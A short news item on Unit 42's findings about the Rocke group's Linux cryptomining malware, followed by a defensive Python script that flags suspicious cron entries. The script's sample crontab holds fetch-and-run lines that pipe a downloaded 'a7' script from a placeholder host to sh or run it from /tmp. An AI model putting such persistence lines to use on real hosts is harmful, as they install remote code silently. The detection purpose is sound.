Linux Virus Removes Security Software to Mine Monero
Security researchers warn that a new form of malware targets Linux servers and disables their security products in order to mine cryptocurrency.
Palo Alto Networks’ Unit 42 reveals that it came across samples of malware used by a group called Rocke to infiltrate Linux systems and look for five different cloud security products that could block further malicious activity on the compromised hosts.
The analysis reveals that, to launch a successful attack, Rocke must first exploit vulnerabilities in other software in order to deploy the malware. Flaws in Apache Struts 2, Oracle WebLogic, and Adobe ColdFusion are being used.
Once the host has been compromised, the malware downloads a script called a7 onto the system and establishes persistence using cron jobs.
Furthermore, it can kill all the other m…
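For defenders auditing hosts for the cron-based persistence described above, the following added example (not code from the article or from Unit 42) flags cron entries that fetch remote content and run it, or that reference the script name a7. The sample crontab, the host files.example.invalid, and the function name `suspicious_cron_entries` are constructed for illustration.

```python
import re

# Constructed crontab content for illustration; not taken from the Unit 42 report.
# files.example.invalid is a placeholder host.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
MAILTO=root
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root (curl -fsSL https://files.example.invalid/a7 || wget -q -O- https://files.example.invalid/a7) | sh
@reboot backup /usr/local/bin/backup.sh --quiet
*/5 * * * * www-data wget -q -O /tmp/.x https://files.example.invalid/a7 && chmod +x /tmp/.x && /tmp/.x
"""

SCHEDULE = re.compile(r"^\s*(?:@\w+|(?:\S+\s+){4}\S+)\s+(?P<rest>.+)$")
ENV_LINE = re.compile(r"^\s*\w+\s*=")
FETCH = re.compile(r"\b(?:curl|wget)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:/bin/)?(?:ba|da|z)?sh\b")
TEMP_PATH = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/\S+")
# Script name reported in the article; extend with names from your own intel.
KNOWN_SCRIPT = re.compile(r"(?:^|[/\s])a7(?=$|[\s)|;&])")


def suspicious_cron_entries(text):
    """Return [(line_number, [reasons])] for cron entries worth triaging."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#") or ENV_LINE.match(line):
            continue  # blank line, comment, or environment assignment
        match = SCHEDULE.match(line)
        if not match:
            continue  # not a schedule entry
        command = match.group("rest")  # may start with a user field in /etc/crontab
        reasons = []
        if FETCH.search(command) and PIPE_TO_SHELL.search(command):
            reasons.append("download piped to shell")
        if FETCH.search(command) and TEMP_PATH.search(command):
            reasons.append("download staged in temp directory")
        if KNOWN_SCRIPT.search(command):
            reasons.append("references script name a7")
        if reasons:
            findings.append((lineno, reasons))
    return findings


if __name__ == "__main__":
    for lineno, reasons in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"line {lineno}: {', '.join(reasons)}")
```

Feed it the contents of /etc/crontab, the files under /etc/cron.d, and each user's `crontab -l` output; a hit is a triage lead, not a verdict, since legitimate jobs also call curl or wget.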